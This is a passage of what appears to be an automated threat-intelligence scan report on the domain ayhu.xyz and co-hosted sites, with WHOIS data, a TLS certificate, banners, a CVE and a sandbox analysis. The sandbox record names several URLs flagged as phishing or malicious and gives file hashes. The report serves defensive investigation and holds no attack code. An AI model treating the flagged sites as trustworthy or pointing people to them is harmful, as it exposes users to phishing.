| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | padt-1 (Net ID: 00:01:21:1F:75:30) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-a028e9 (Net ID: 00:01:8E:A0:28:E8) | 50.1188, 8.6843 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare Turnstile | www.ayhu.xyz |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 34.148.97.127 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101kvmt.github.io]
https://www.openphish.com/feed.txt | 0101kvmt.github.io |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.116): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:31:34 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | proxy@whoisprotectservice.com | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.108.153 |
| 2023-05-12 02:59:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 20:16:54.437 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C8:55:7C:0B:F2:4A:D4:C9:EE:94:0C:
EF:F0:9C:B6:19:B4:91:58:D6:05:71:7A:F5:C2:94:2C:
9E:8C:8E:37:13:02:21:00:C3:46:D2:16:74:93:8F:9F:
59:96:75:0B:A5:1F:5C:5A:BA:2E:0B:68:95:99:31:FD:
8E:F4:F0:AD:8C:28:9C:38
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 20:16:54.945 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:56:36:5F:B8:65:E8:68:80:21:A3:19:B2:
BC:D2:DF:5E:37:2A:78:11:0B:85:DC:F6:3B:9D:68:A0:
01:45:B2:7A:02:21:00:F7:C3:7B:2A:F6:13:73:9F:A7:
7D:92:7F:BE:68:5C:0B:AC:65:3E:D3:C0:77:63:D7:8E:
8C:49:1F:4E:78:C9:F8
Signature Algorithm: sha256WithRSAEncryption
19:28:98:d2:20:85:e1:e5:94:d2:07:4b:30:9a:e6:b6:e4:f1:
ad:75:85:78:99:6b:59:96:02:40:a2:83:06:c7:f8:4b:09:6b:
d8:c6:16:df:8e:4c:8d:6d:4a:1d:5a:f5:c8:a4:e3:2f:c5:9a:
c2:e7:23:9f:4a:37:31:fd:55:44:73:22:2a:44:61:cf:38:41:
c2:bf:84:91:0c:26:d9:7f:95:38:c2:5e:aa:df:96:5c:61:36:
99:62:0f:05:bf:92:14:5f:8a:b8:a2:35:64:d7:1c:77:57:f2:
14:f6:3d:8f:7c:2a:9d:f0:7f:5d:fa:03:91:91:47:ff:d2:1a:
85:ec:d6:48:54:87:06:a2:cf:92:72:de:97:97:3d:dc:bf:11:
68:d0:47:02:79:9f:6f:0e:40:4b:ee:a8:97:3a:1f:7e:86:fc:
be:c0:35:24:74:e2:90:dc:a8:be:80:41:5d:16:68:1a:e2:f2:
91:2d:ad:23:3a:69:76:43:d0:49:f2:a4:be:8e:a3:7f:0d:0c:
dc:d6:f8:b0:66:4e:c9:15:34:47:d2:92:fb:73:d0:4a:4c:2e:
53:df:fc:69:43:c4:55:ae:6f:33:b7:7f:e1:98:80:11:3e:a5:
b5:ef:1b:cd:21:0c:3d:64:7d:11:08:c6:8c:70:59:7e:61:c0:
ea:e4:74:3d
| ayhu.xyz |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | ayhu.xyz |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5eacee2fce86e1-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 02:58:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://prizewon.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_1e4_IE_EarlyTabStart_0x92c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00000484]\n "_0120F538-2ED4-11ED-979B-080027824D91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F6914A8F-2ED3-11ED-979B-080027824D91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000484]\n "GPONACP1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GPONACP1.txt]- [targetUID: 00000000-00003248]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003248]\n "RecoveryStore._F6914A8D-2ED3-11ED-979B-080027824D91_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003248]\n "~DFCD2D3215CD5B7958.TMP" has type "data"- Location: [%TEMP%\\~DFCD2D3215CD5B7958.TMP]- [targetUID: 00000000-00000484]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00003248]\n "~DF3484836589E2DE35.TMP" has type "data"- Location: [%TEMP%\\~DF3484836589E2DE35.TMP]- [targetUID: 00000000-00000484]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00000484]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\VERSION.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CRYPTBASE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEFRAME.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SSPICLI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEShims.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\sqmapi.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\NETAPI32.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\NETUTILS.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SRVCLI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WKSCLI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SUSPEND.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\ieproxy.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\GROOVEEX.DLL"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://prizewon.netlify.app/"\n Pattern match: "https://prizewon.netlify.app"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: https://trustpadclaim.com/ (AV positives: 18/88 scanned on 09/07/2022 18:54:04)\n URL: http://sneakerheads.cloud/ (AV positives: 2/88 scanned on 09/07/2022 18:55:54)\n URL: http://nintransfer.netlify.app/ (AV positives: 4/88 scanned on 09/07/2022 18:34:11)\n URL: http://idyllic-daifuku-b85f05.netlify.app/ (AV positives: 13/88 scanned on 09/07/2022 17:49:10)\n URL: http://blazedeyesnft.com/ (AV positives: 1/88 scanned on 09/07/2022 16:56:25)\n File SHA256: 36eb1753e832efc58da3e4cabb41889431d40148c764102779990002ba64d406 (AV positives: 25/75 scanned on 09/07/2022 02:21:27)\n File SHA256: 6f9c9c07baf531f437439e7ca85d184ad2aa50ac0fc19ae7df1a0200ee6662c1 (AV positives: 16/75 scanned on 09/02/2022 23:37:08)\n File SHA256: af8e70766c48acbad202f632a415cb626f12d4e7f79199f4fa962c5742ec013a (AV positives: 14/74 scanned on 09/01/2022 01:42:29)\n File SHA256: b826852864a22bd5a2ec0917c78324b0bf826b9e91d699a4e58143f7c5c0ff2d (AV positives: 22/74 scanned on 08/29/2022 11:54:56)\n File SHA256: 3438c53d0f0c41ec6144a95f74dc47efd13884baa23539445bc174ca0c299f51 (AV positives: 25/75 scanned on 08/27/2022 23:46:12)\n File SHA256: faa32adb3d32d68cd8bc667b146e874a96cb4469d8e5dbbe4122216b9771bd2e (Date: 11/17/2019 03:18:46)'}], u'threat_level': 0, u'size': None, u'job_id': u'6318f2cc0b9d381dff465a33', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'suspicious_identifiers': [], u'attck_id': u'T1083', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'File and Directory Discovery', u'informative_identifiers': [], u'tactic': u'Discovery', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'f47a058697e7bd050260e62793cca89181c3f1843751027258c6005091b1159d', u'sha512': u'84382d77818279513fffe39003de9fe | 34.74.170.74 |
| 2023-05-12 02:57:38 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.p01.nsone.net
Name Server: dns2.p01.nsone.net
Name Server: dns3.p01.nsone.net
Name Server: dns4.p01.nsone.net
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Please query the WHOIS server of the owning registrar identified in this
output for information on how to contact the Registrant, Admin, or Tech
contact of the queried domain name.
WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely
for query-based, informational purposes. By querying our WHOIS database, you
are agreeing to comply with these terms
(https://www.registry.google/about/whois-disclaimer.html) and acknowledge
that your information will be used in accordance with CRR's Privacy Policy
(https://www.registry.google/about/privacy.html), so please read those
documents carefully. Any information provided is "as is" without any
guarantee of accuracy. You may not use such information to (a) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations; (b) enable high volume, automated,
electronic processes that access the systems of CRR or any ICANN-Accredited
Registrar, except as reasonably necessary to register domain names or modify
existing registrations; or (c) engage in or support unlawful behavior. CRR
reserves the right to restrict or deny your access to the Whois database,
and may modify these terms at any time.
Domain Name: netlify.app
Registry Domain ID: 2CB5C0CD0-APP
Registrar WHOIS Server: whois.nic.google
Registrar URL: http://www.name.com
Updated Date: 2023-04-11T15:58:16Z
Creation Date: 2018-05-08T22:48:05Z
Registry Expiry Date: 2024-05-08T22:48:05Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Netlify
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: CA
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
